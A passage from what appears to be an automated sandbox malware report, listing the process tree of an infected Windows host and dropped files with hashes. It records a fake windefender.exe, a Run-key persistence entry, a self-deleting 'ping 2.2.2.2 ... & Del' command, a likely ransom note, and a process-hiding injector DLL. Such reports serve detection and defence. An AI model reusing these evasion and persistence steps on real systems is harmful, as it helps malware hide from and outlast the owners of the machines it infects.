                          C:\Users\Admin\Pictures\RAus8SFt5ecM23w4L2GQk0YC.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x690a21c8,0x690a21d4,0x690a21e0
                          4⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:7944
                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\RAus8SFt5ecM23w4L2GQk0YC.exe
                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\RAus8SFt5ecM23w4L2GQk0YC.exe" --version
                          4⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:6392
                  • C:\Windows\system32\taskmgr.exe
                    "C:\Windows\system32\taskmgr.exe" /4
                    1⤵
                    • Drops file in Windows directory
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    • Suspicious use of WriteProcessMemory
                    PID:17004
                    • C:\Windows\system32\taskmgr.exe
                      "C:\Windows\system32\taskmgr.exe" /1
                      2⤵
                      • Loads dropped DLL
                      • Drops file in Windows directory
                      • Checks SCSI registry key(s)
                      • Modifies registry class
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: GetForegroundWindowSpam
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:22124
                  • C:\Windows\windefender.exe
                    C:\Windows\windefender.exe
                    1⤵
                    • Executes dropped EXE
                    • Modifies data under HKEY_USERS
                    PID:9960
                  • C:\Windows\System32\rundll32.exe
                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                    1⤵
                      PID:16432
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k SDRSVC
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:6264
                    • C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe
                      "C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe"
                      1⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Suspicious use of AdjustPrivilegeToken
                      PID:20592
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe
                        2⤵
                          PID:19836
                          • C:\Windows\SysWOW64\PING.EXE
                            ping 2.2.2.2 -n 1 -w 3000
                            3⤵
                            • Runs ping.exe
                            PID:20644
                      • C:\Windows\system32\OpenWith.exe
                        C:\Windows\system32\OpenWith.exe -Embedding
                        1⤵
                        • Modifies registry class
                        • Suspicious behavior: GetForegroundWindowSpam
                        • Suspicious use of SetWindowsHookEx
                        PID:21000
                      • C:\Windows\system32\NOTEPAD.EXE
                        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\file.txt
                        1⤵
                        • Opens file in notepad (likely ransom note)
                        PID:16572
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe"
                        1⤵
                          PID:22236
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe"
                            2⤵
                            • Checks processor information in registry
                            • Modifies registry class
                            • NTFS ADS
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of SetWindowsHookEx
                            PID:22132
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.0.761458766\1283516238" -parentBuildID 20221007134813 -prefsHandle 1724 -prefMapHandle 1716 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7fe25fe2-29bf-4f18-909f-bb0ad5413023} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 1816 18b58bd6a58 gpu
                              3⤵
                                PID:22476
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.1.1119650118\363977459" -parentBuildID 20221007134813 -prefsHandle 2140 -prefMapHandle 2128 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5885d735-ae73-4ce5-b95e-2748595eeffd} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 2164 18b58737258 socket
                                3⤵
                                  PID:9748
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.2.2080356938\1498724895" -childID 1 -isForBrowser -prefsHandle 2892 -prefMapHandle 2888 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {790d56b0-7042-4de1-9b0f-db29a74875b1} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 2904 18b5ce97b58 tab
                                  3⤵
                                    PID:10656
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.3.1650669351\208864390" -childID 2 -isForBrowser -prefsHandle 3256 -prefMapHandle 3252 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {64b429e0-f1bf-44cc-8544-5a4baaad3f76} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 996 18b46862558 tab
                                    3⤵
                                      PID:4820
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.4.39111859\459681240" -childID 3 -isForBrowser -prefsHandle 4132 -prefMapHandle 4128 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3fae0f5c-800d-4896-ba08-7d51eefca126} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 4144 18b5e8ca858 tab
                                      3⤵
                                        PID:22104
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.5.1206322014\349148100" -childID 4 -isForBrowser -prefsHandle 4884 -prefMapHandle 4868 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3137ae56-adaa-496f-87cf-fca10b21d9a8} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 4896 18b5ef72858 tab
                                        3⤵
                                          PID:15844
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.6.48820180\180765753" -childID 5 -isForBrowser -prefsHandle 5036 -prefMapHandle 5040 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {37046f28-5d37-4d14-9210-71481893df5d} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 5028 18b5f395558 tab
                                          3⤵
                                            PID:17564
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.7.150762552\563370986" -childID 6 -isForBrowser -prefsHandle 5232 -prefMapHandle 5236 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b990d43f-0e0c-4551-998c-7cff8c244d29} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 5224 18b5f397058 tab
                                            3⤵
                                              PID:2936
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.8.1609566664\1850000674" -childID 7 -isForBrowser -prefsHandle 5604 -prefMapHandle 5600 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f317a4ba-7feb-480f-b7d6-c1fcbb7e2ddb} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 4640 18b60e6b158 tab
                                              3⤵
                                                PID:2504
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.9.74855379\1169752606" -childID 8 -isForBrowser -prefsHandle 4244 -prefMapHandle 5916 -prefsLen 26424 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {45398137-37c3-44b5-bb6c-51db84f2a330} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 4232 18b5ce98a58 tab
                                                3⤵
                                                  PID:1664
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.10.193100520\78004601" -childID 9 -isForBrowser -prefsHandle 5980 -prefMapHandle 5976 -prefsLen 26424 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c3ba369d-0eea-4e35-a565-956629a50785} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 5988 18b5d20b858 tab
                                                  3⤵
                                                    PID:12160
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.11.1807750368\2005817894" -childID 10 -isForBrowser -prefsHandle 5424 -prefMapHandle 5420 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {de03f5fe-bb9e-412e-a2a2-1ebbdf000f35} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 5308 18b60ee1858 tab
                                                    3⤵
                                                      PID:18260
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.12.1603924224\751028772" -childID 11 -isForBrowser -prefsHandle 5412 -prefMapHandle 5604 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ac1cbe18-d9f4-4d0e-9dfe-1fb8d6e2d203} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 5824 18b5d594558 tab
                                                      3⤵
                                                        PID:15264
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.13.871336187\333813456" -childID 12 -isForBrowser -prefsHandle 6008 -prefMapHandle 5972 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c57963fa-6b75-4c4f-92c1-4dfb96797cc1} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 5996 18b5d348858 tab
                                                        3⤵
                                                          PID:16600
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.14.274536080\251658328" -childID 13 -isForBrowser -prefsHandle 9876 -prefMapHandle 9872 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c22d5c6d-ad17-4823-9868-206f82a41406} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 9884 18b5d503558 tab
                                                          3⤵
                                                            PID:16608
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.15.1686809643\2123248245" -childID 14 -isForBrowser -prefsHandle 9876 -prefMapHandle 9872 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d9bbebc3-394e-427b-94d6-f2d1a4e60004} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 6032 18b5ffb5158 tab
                                                            3⤵
                                                              PID:19252
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="22132.16.1946648958\571724906" -childID 15 -isForBrowser -prefsHandle 10092 -prefMapHandle 10100 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0174db77-d861-491f-a9f2-1b10338c9a3a} 22132 "\\.\pipe\gecko-crash-server-pipe.22132" 10096 18b5ffb6058 tab
                                                              3⤵
                                                                PID:19260
                                                          • C:\Users\Admin\Desktop\dnSpy.exe
                                                            "C:\Users\Admin\Desktop\dnSpy.exe"
                                                            1⤵
                                                              PID:4372

                                                            Network

                                                            MITRE ATT&CK Enterprise v15

                                                            Downloads

                                                            • C:\ProgramData\Are.docx

                                                              Filesize

                                                              11KB

                                                            • C:\ProgramData\mozglue.dll

                                                              Filesize

                                                              593KB

                                                            • C:\Users\Admin\AppData\Local\GA3lpfXnbBBqwEiceGtIdE9c.exe

                                                              Filesize

                                                              128KB

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\RE0OB4HE\862GPXBU.txt

                                                              Filesize

                                                              12B

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PRICache\1601268389\3877292338.pri

                                                              Filesize

                                                              162KB

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PRICache\4183903823\810424605.pri

                                                              Filesize

                                                              2KB

                                                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\cache2\doomed\228

                                                              Filesize

                                                              21KB

                                                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\cache2\doomed\5631

                                                              Filesize

                                                              12KB

                                                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\cache2\entries\45514F58EE166DE19E4DE720A21DDF1DA12F6C6C

                                                              Filesize

                                                              203KB

                                                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\cache2\entries\46C625DB4964C00323A8EF4C60828B52A454EBB4

                                                              Filesize

                                                              1.1MB

                                                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\cache2\entries\80AF8614EB0CDD7B24B3BE186294D327C8A18584

                                                              Filesize

                                                              82KB

                                                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\cache2\entries\80BB96996C8133B0FE5E0D6E5EA21B26135E8EA2

                                                              Filesize

                                                              111KB

                                                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\cache2\entries\87756117B997D16946BBD58DB5E9B356AED41120

                                                              Filesize

                                                              186KB

                                                              MD5

                                                              2f75bd0368b74b6fd5c58d9e1e040a90

                                                              SHA1

                                                              0a7823f6751afdeaf9b80c77c5e0562ba58b1546

                                                              SHA256

                                                              89a11b0ab58593c93608a8e5b55715abefb00557ac82e656b74bc5bb30bd0adb

                                                              SHA512

                                                              91b4fb6f91b83e0da30b49320239ae2e87191cd1ea813b38b823eeeb0f289fee227ab80e85ed17819fe8044a79e984a2f56d838539170e7a355e06eca4a27df2

                                                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\cache2\entries\971254C7341460E85C93D0821B91E9985A0B32D6

                                                              Filesize

                                                              2.0MB

                                                              MD5

                                                              ed082326c96909b827ed3a43b07c7df5

                                                              SHA1

                                                              c8b0570515f0f2601fab8d406bdd95e19c1efacb

                                                              SHA256

                                                              9cbedd2ead28b2870f5a12f218b4d3fd8e0a5c178bbcad397438329d4211634c

                                                              SHA512

                                                              3c08f0b03bef1517ae626fc173a344c795e5fbc0f5667f3570eb2e973917cf4fb1b65bce0099c51a1bc14d93d11c996feeeba1a6df40ec96fe5739720b6b3d83

                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\CkelNmqDwew6WPNzMTNOQeqx.exe

                                                              Filesize

                                                              2.8MB

                                                              MD5

                                                              5bc00af1415ed282eefc3fb25cb45e8d

                                                              SHA1

                                                              4297fe9cf047e5a5beb72c2c3020cffed6de2b5a

                                                              SHA256

                                                              62d16ad20ef01d317b4416ae3fafac9cfcab8539688104fb0a94f9a1e0b97d1d

                                                              SHA512

                                                              ea8c627926ecc3847db07be545788ecabc1b95e5805070efebe13324c458fd49e10ca8a3aecd0d23bf8ac72bc317b6204325bf67c7f4ef9fcb4d277591822257

                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\o80VeACipQO1BsWWJMh5Q0G4.exe

                                                              Filesize

                                                              2.8MB

                                                              MD5

                                                              9f4e2eed379a7b0a1a926e5376d50f26

                                                              SHA1

                                                              541e0c17778896f4022b5adda537c0545d08cabc

                                                              SHA256

                                                              e269e7f806b9d2672095d63c6244877b886003921060a72a69d69e24635c0f75

                                                              SHA512

                                                              bd7446f4201c3d14f9e22ca6906164da19c5eb44cdef180bb43420e59ba7a852f84388c41c7f3e8cd09b62b2ca20daca7e288c0f527ed2da0d2e07bdd2e7be7e

                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\additional_file0.tmp

                                                              Filesize

                                                              2.5MB

                                                              MD5

                                                              20d293b9bf23403179ca48086ba88867

                                                              SHA1

                                                              dedf311108f607a387d486d812514a2defbd1b9e

                                                              SHA256

                                                              fd996b95ae46014edfd630bfc2bf8bc9e626adf883a1da017a8c3973b68ec348

                                                              SHA512

                                                              5d575c6f0d914583f9bb54f7b884caf9182f26f850da9bdd962f4ed5ed7258316a46fafaf3828dccb6916baaadb681fe1d175a3f4ed59f56066dc7e32b66f7b6

                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\assistant_installer.exe

                                                              Filesize

                                                              1.9MB

                                                              MD5

                                                              b3f05009b53af6435e86cfd939717e82

                                                              SHA1

                                                              770877e7c5f03e8d684984fe430bdfcc2cf41b26

                                                              SHA256

                                                              3ea8d40fcede1fc03e5603246d75d13e8d44d7229d4c390c39a55534053027f7

                                                              SHA512

                                                              d2dee80aaa79b19f1eb1db85079a05f621780e06bfea9e838b62d757ba29399f9090ec7c6ff553377c9b712f3ba8dd812cdff39f3e28829928e86746a8ac6b27

                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\dbghelp.dll

                                                              Filesize

                                                              1.7MB

                                                              MD5

                                                              925ea07f594d3fce3f73ede370d92ef7

                                                              SHA1

                                                              f67ea921368c288a9d3728158c3f80213d89d7c2

                                                              SHA256

                                                              6d02ebd4ec9a6093f21cd8ccefb9445fa0ab7b1f69ac868a5cfc5d28ed8d2de9

                                                              SHA512

                                                              a809851da820d9fdd8fb860a8f549311dcc2579df2c6f6fba74f50d5d8bf94baa834b09fb5476ac248f18d1deb6b47d4fdd6d658889d5d45ca8774a9264483d2

                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\opera_package

                                                              Filesize

                                                              96.4MB

                                                              MD5

                                                              5834851d3c160e070c3b0263ed62bd6d

                                                              SHA1

                                                              91d31ed84473f8ddf7ce85bb0e0d2953247c6f66

                                                              SHA256

                                                              ebab603527bd3a1066fb6142a3bae3c983b3566b1c4f53e82ae75fb8b6bb7352

                                                              SHA512

                                                              bba794f81268494fec3dc51dbb2a5b2c1c427ea1453adfc113bad30b2ad34fa56c94f7b95f10190beee1884b196a0f3a4f6466dc19c569d418745eb9ce0bd555

                                                            • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

                                                              Filesize

                                                              1.7MB

                                                              MD5

                                                              eee5ddcffbed16222cac0a1b4e2e466e

                                                              SHA1

                                                              28b40c88b8ea50b0782e2bcbb4cc0f411035f3d5

                                                              SHA256

                                                              2a40e5dccc7526c4982334941c90f95374460e2a816e84e724e98c4d52ae8c54

                                                              SHA512

                                                              8f88901f3ebd425818db09f268df19ccf8a755603f04e9481bcf02b112a84393f8a900ead77f8f971bfa33fd9fa5636b7494aaee864a0fb04e3273911a4216dc

                                                            • C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe

                                                              Filesize

                                                              101KB

                                                              MD5

                                                              42b838cf8bdf67400525e128d917f6e0

                                                              SHA1

                                                              a578f6faec738912dba8c41e7abe1502c46d0cae

                                                              SHA256

                                                              0e4ffba62ce9a464aa1b7ff9f1e55ace8f51ff1e15102d856f801a81f8b4607d

                                                              SHA512

                                                              f64b39d885375251ab7db72c57dc5b5095f0c6412169f1035d1f6a25b8415a2a01004d06bfa0267cf683ef7dea7a9f969ad43fde5a4376f1fcb65a57403433c0

                                                            • C:\Users\Admin\AppData\Local\Temp\Opera_installer_24031213080313014428.dll

                                                              Filesize

                                                              320KB

                                                              MD5

                                                              1575da260ab5d482d31eaec008ef5d0d

                                                              SHA1

                                                              dfc3f3a84e40bc1940c212ccdf4a79080a02f233

                                                              SHA256

                                                              83d70327b2e33129c30cf60b21cadaa7ff37c122a65c17a49b1aa6100a4b8c72

                                                              SHA512

                                                              e72f7546285433f9c9047154f7755729fbc6c6dc7900c94dd01cff3940853a47842461e6d44d6414843942ac4ddece9f30018b0249f2795b290f454edc77c04d

                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xensmedw.0qa.ps1

                                                              Filesize

                                                              1B

                                                              MD5

                                                              c4ca4238a0b923820dcc509a6f75849b

                                                              SHA1

                                                              356a192b7913b04c54574d18c28d46e6395428ab

                                                              SHA256

                                                              6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                              SHA512

                                                              4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                            • C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

                                                              Filesize

                                                              99KB

                                                              MD5

                                                              09031a062610d77d685c9934318b4170

                                                              SHA1

                                                              880f744184e7774f3d14c1bb857e21cc7fe89a6d

                                                              SHA256

                                                              778bd69af403df3c4e074c31b3850d71bf0e64524bea4272a802ca9520b379dd

                                                              SHA512

                                                              9a276e1f0f55d35f2bf38eb093464f7065bdd30a660e6d1c62eed5e76d1fb2201567b89d9ae65d2d89dc99b142159e36fb73be8d5e08252a975d50544a7cda27

                                                            • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

                                                              Filesize

                                                              281KB

                                                              MD5

                                                              d98e33b66343e7c96158444127a117f6

                                                              SHA1

                                                              bb716c5509a2bf345c6c1152f6e3e1452d39d50d

                                                              SHA256

                                                              5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

                                                              SHA512

                                                              705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

                                                            • C:\Users\Admin\AppData\Local\Temp\is-D323T.tmp\_isetup\_shfoldr.dll

                                                              Filesize

                                                              22KB

                                                              MD5

                                                              92dc6ef532fbb4a5c3201469a5b5eb63

                                                              SHA1

                                                              3e89ff837147c16b4e41c30d6c796374e0b8e62c

                                                              SHA256

                                                              9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

                                                              SHA512

                                                              9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

                                                            • C:\Users\Admin\AppData\Local\Temp\is-RGDCL.tmp\aCVfJ427wn6CARWtL1GFkhK1.tmp

                                                              Filesize

                                                              690KB

                                                              MD5

                                                              1c1fd0b05187f81f28f910eb5b511e12

                                                              SHA1

                                                              9e9f7b8f19b461704af327fc4e46dee77e9c19cc

                                                              SHA256

                                                              0eb10a29c808bb5783494e1c9a74410efac9a687a46e3056f7a783f9461e543f

                                                              SHA512

                                                              08884cdd2ca4d4689e1886f23343b236907cbd999984b5d7ad18b3fc74d59b08f92a9231c1d412dbf9466ce76b7b11a54db0ceb14c4292fa33557cf3d2273185

                                                            • C:\Users\Admin\AppData\Local\Temp\is-RGDCL.tmp\aCVfJ427wn6CARWtL1GFkhK1.tmp

                                                              Filesize

                                                              64KB

                                                              MD5

                                                              3f632e368fb2c86defcdebb66abc39eb

                                                              SHA1

                                                              cd515a69cc5f764ef605f4995854754a0eafdb7a

                                                              SHA256

                                                              71d82bd60c77a6939fc311c9dd16209291d5637e5919ce76280be849bc18fcf5

                                                              SHA512

                                                              12349b3407a192f34b15f393030877a98f0cf679522bfc3189af0989707d8dd49a21ed64d4238ab9493466fcbc4d368ccadc657a20aecf9a16404e306a81049f

                                                            • C:\Users\Admin\AppData\Local\Temp\syncUpd.exe

                                                              Filesize

                                                              200KB

                                                              MD5

                                                              c722591f624fb69970f246b8c81d830f

                                                              SHA1

                                                              85516decea5d6987bebe39cbadf36053beaf4bb0

                                                              SHA256

                                                              13cd1152a19fdac6581cac2bd822f34bd3026ea1783ff231e299b6d28c046a6a

                                                              SHA512

                                                              822584c5c8a0813af4d845e80919776c71a43464ab719d1c303ebaae6a8ed47763183566bedc9be2e8c44de8ee6fd62d1e12be471e5d5c73ae4b1dcdaa34a908

                                                            • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                                              Filesize

                                                              442KB

                                                              MD5

                                                              85430baed3398695717b0263807cf97c

                                                              SHA1

                                                              fffbee923cea216f50fce5d54219a188a5100f41

                                                              SHA256

                                                              a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e

                                                              SHA512

                                                              06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

                                                            • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

                                                              Filesize

                                                              8.0MB

                                                              MD5

                                                              a01c5ecd6108350ae23d2cddf0e77c17

                                                              SHA1

                                                              c6ac28a2cd979f1f9a75d56271821d5ff665e2b6

                                                              SHA256

                                                              345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42

                                                              SHA512

                                                              b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

                                                            • C:\Users\Admin\AppData\Local\Web Link Analyzer\is-4HNS6.tmp

                                                              Filesize

                                                              103KB

                                                              MD5

                                                              0c6452935851b7cdb3a365aecd2dd260

                                                              SHA1

                                                              83ef3cd7f985acc113a6de364bdb376dbf8d2f48

                                                              SHA256

                                                              f8385d08bd44b213ff2a2c360fe01ae8a1eda5311c7e1fc1a043c524e899a8ed

                                                              SHA512

                                                              5ff21a85ee28665c4e707c7044f122d1bac8e408a06f8ea16e33a8c9201798d196fa65b24327f208c4ff415e24a5ad2414fe7a91d9c0b0d8cff88299111f2e1d

                                                            • C:\Users\Admin\AppData\Local\Web Link Analyzer\is-HK7SE.tmp

                                                              Filesize

                                                              122KB

                                                              MD5

                                                              6231b452e676ade27ca0ceb3a3cf874a

                                                              SHA1

                                                              f8236dbf9fa3b2835bbb5a8d08dab3a155f310d1

                                                              SHA256

                                                              9941eee1cafffad854ab2dfd49bf6e57b181efeb4e2d731ba7a28f5ab27e91cf

                                                              SHA512

                                                              f5882a3cded0a4e498519de5679ea12a0ea275c220e318af1762855a94bdac8dc5413d1c5d1a55a7cc31cfebcf4647dcf1f653195536ce1826a3002cf01aa12c

                                                            • C:\Users\Admin\AppData\Local\Web Link Analyzer\is-LPNR0.tmp

                                                              Filesize

                                                              66KB

                                                              MD5

                                                              f06b0761d27b9e69a8f1220846ff12af

                                                              SHA1

                                                              e3a2f4f12a5291ee8ddc7a185db2699bffadfe1a

                                                              SHA256

                                                              e85aecc40854203b4a2f4a0249f875673e881119181e3df2968491e31ad372a4

                                                              SHA512

